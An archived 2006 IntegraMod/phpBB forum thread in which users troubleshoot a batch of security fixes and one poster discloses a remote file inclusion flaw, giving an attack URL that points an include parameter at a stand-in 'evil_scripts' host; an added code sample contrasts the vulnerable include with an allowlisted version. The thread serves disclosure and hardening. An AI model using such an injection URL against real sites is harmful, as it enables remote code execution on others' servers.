Recent Hacking Discussion (continued...)

This is where you'll find security-related information.
Discuss Integramod/phpbb security issues here.

Moderator: Integra Moderator

Re: Recent Hacking Discussion (continued...)

PostAuthor: ihammo » Wed Aug 30, 2006 10:55 am

Hmm.. Not really sure then tbh. I am no expert (especially with htaccess!) and we have already reached the limit of my knowledge - everything I know I have learnt from trial and error building my one and only site!

Hopefully someone with a bit more know-how can help further (sorry!)

PostAuthor: tekguru » Wed Aug 30, 2006 11:28 am

Since installing this batch of fixes we've found:

- RSS Feeds no longer function
- M2F no longer sends out messages

These are really essential to us, so anyone any ideas on how to fix them, or which of the Mods may need backing out to get them working again?

HELP!

PostAuthor: tekguru » Wed Aug 30, 2006 3:45 pm

Fixed it - false alarm guys

PostAuthor: tekguru » Wed Aug 30, 2006 3:47 pm

Only one question though, how can we effect a style change without the functionality in there?

We use a 'Mobile' theme which a fair number of our users need to use and since adding the fixes in we are of course unable to change the style?

PostAuthor: Solomon » Wed Aug 30, 2006 4:07 pm

tekguru wrote:
> Only one question though, how can we effect a style change without the functionality in there?
>
> We use a 'Mobile' theme which a fair number of our users need to use and since adding the fixes in we are of course unable to change the style?

I've been told it's OK to re-enable the Style Select block after you apply the fixes.

PostAuthor: Michaelo » Wed Aug 30, 2006 5:57 pm

Style Change Block... The best way is to test it...

With or without register globals being off it should be OK, however run a test as you have been and prove it for yourselves... The edits work for me and I have tried all known hacks to get past it...

If your provider has registered globals on get them to turn them off... not only are they not needed they will be removed soon enough... If my provider has them on and would not turn them off I would move providers...

PostAuthor: Vadar » Wed Aug 30, 2006 6:55 pm

For Mike: With all of the changes applied, I have quite a number of pages within the ACP closed down with the hacking attempt message. I can no longer even click on PhP Info (Tools block) without getting that message.

My question is, is this normal with these fixes applied or have I done something wrong?

Thanks

PostAuthor: Michaelo » Wed Aug 30, 2006 7:13 pm

Recheck the functions.php edits and if still blocked from a page post the first ten lines of that page...
Mike

PostAuthor: tekguru » Thu Aug 31, 2006 9:27 am

Right, silly Q, but how do we turn back on the style changer?

PostAuthor: sasan » Thu Aug 31, 2006 11:25 am

Hi guys, in 2 weeks we can find 4 bugs in the IntegraMod portal, these bugs with high risk. This form has 5 bugs, XSS and SQL injection; I can put them here until repair, but these bugs are not very important! Until a new bug was found: this method's name is Remote File Inclusion Vulnerabilities. With this bug you can run any PHP script from a different server, such as this link:
http://www.exmaple.ir/frame.php?body=ht ... 287.txt%3F (I changed the domain name, but if you want I can get a true link!!) See this line:
include_once ($chemin."conf/code.php")
It's one line of mod_phpalbum in Portail PHP; it has a bug and file inclusion!!! Now a hacker can access any shell on this server with this link:

http://www.site.com/[path]/mod_phpalbum/sommaire_admin.php?chemin=http://evil_scripts?
In IntegraMod also 4 files have this problem!!
functions_mod_user.php
functions.php
functions_portal.php
I searched a lot and read line by line in the Integra files, but I can find any dangerous bug in these files!!! They have some bugs with low risk, but maybe any hacker can find a new bug!!!!!! I don't say Integra doesn't have bugs, but I tried and can't find any dangerous bug!! Now, if you don't want to be hacked!! With the same method you can use cPanel and set permissions on your includes folder, admin folder, and any folder you think needs protecting with a password! With this, if your forum has a bug, until the hacker has your password protection he can't do anything!!
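
The include pattern quoted in the post above, next to a hardened form, as an added example (not code from IntegraMod, Portail PHP or any poster in this thread). APP_ROOT, $ALLOWED_CONF, conf_path() and polluted_include_target() are hypothetical names, and the sample requests are constructed.

```php
<?php
// Added illustration only; all names below are hypothetical.

// Vulnerable pattern from the post (left commented out on purpose):
//     include_once ($chemin."conf/code.php");
// $chemin is never assigned by the script. With register_globals = On, PHP
// creates it from the request (?chemin=...), so the caller picks the include
// prefix; if remote URL includes are enabled, that prefix can be another server.

// Emulate register_globals on a constructed request to show the polluted value.
function polluted_include_target(array $request)
{
    extract($request);                      // what register_globals did implicitly
    $chemin = isset($chemin) ? $chemin : '';
    return $chemin . 'conf/code.php';       // string the vulnerable line would include
}

// Hardened form: the prefix is a server-side constant and the file name comes
// from an exact-match allowlist, so no request byte reaches include_once.
define('APP_ROOT', __DIR__ . '/');
$ALLOWED_CONF = array('code', 'lang');      // constructed list of includable files

function conf_path($name, array $allowed)
{
    if (!is_string($name) || !in_array($name, $allowed, true)) {
        return null;                        // reject anything not on the list
    }
    return APP_ROOT . 'conf/' . $name . '.php';
}

// Constructed sample requests.
$samples = array(
    array('chemin' => 'http://evil_scripts?'),   // value taken from the post's URL
    array(),                                     // normal request, no parameter
);
foreach ($samples as $req) {
    echo 'vulnerable include target: ', polluted_include_target($req), "\n";
}
foreach (array('code', 'http://evil_scripts?', '../admin/x') as $name) {
    $path = conf_path($name, $ALLOWED_CONF);
    echo str_pad($name, 22), ' => ', $path === null ? 'rejected' : $path, "\n";
}
```

On the configuration side, register_globals = Off (as Michaelo advises earlier in the thread) stops the request from creating $chemin, and allow_url_include = Off (PHP 5.2 and later) stops include from fetching URLs; the code fix is still needed because neither setting protects local paths.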

PostAuthor: Fubie » Thu Aug 31, 2006 12:03 pm

That's excellent information sasan!

Was this done for IM 140 or IM141 beta?

We will be releasing RC4 which will be a post hack fix test release soon. I'm curious to see how well that will stand up especially after all the long hours Mike put into it.

PostAuthor: computerz » Thu Aug 31, 2006 2:24 pm

Hey so far so good guys.. I've applied the changes and haven't been hacked...... yet....... I've set 777 permissions on upload folders since yesterday. The hackers usually get me within a week of doing so, so I'll give it another week and if I don't hear from the hackers, I'll say that it worked.

But it's good to know that Michaelo tried to hack it himself and couldn't get by it.

@Michaelo,

You mean you tried to remotely upload files to the 777 directories right, while not logged on as a user right?

I hope you tested for this, because the hackers who hacked my site were not logged on. I assume they copied my source and altered the forms or something, but in any case they were able to get perl scripts and .zip files in my upload folders.

PostAuthor: Michaelo » Thu Aug 31, 2006 5:43 pm

The two files used in the above hack are not part of 1.4.0 or 1.4.1, so I assume these are part of a mod that some people have added... Unfortunately I can test them... therefore I can fix them...

PostAuthor: Vadar » Thu Aug 31, 2006 8:44 pm

Mike: Thanks. I went back in with a clean functions.php, verified that the problem went away, then added the fixes again, a bit more carefully this time...

Problem solved.

PostAuthor: Michaelo » Fri Sep 01, 2006 7:58 am

No worries Vadar... If I had a penny for every time I did that I could buy a new car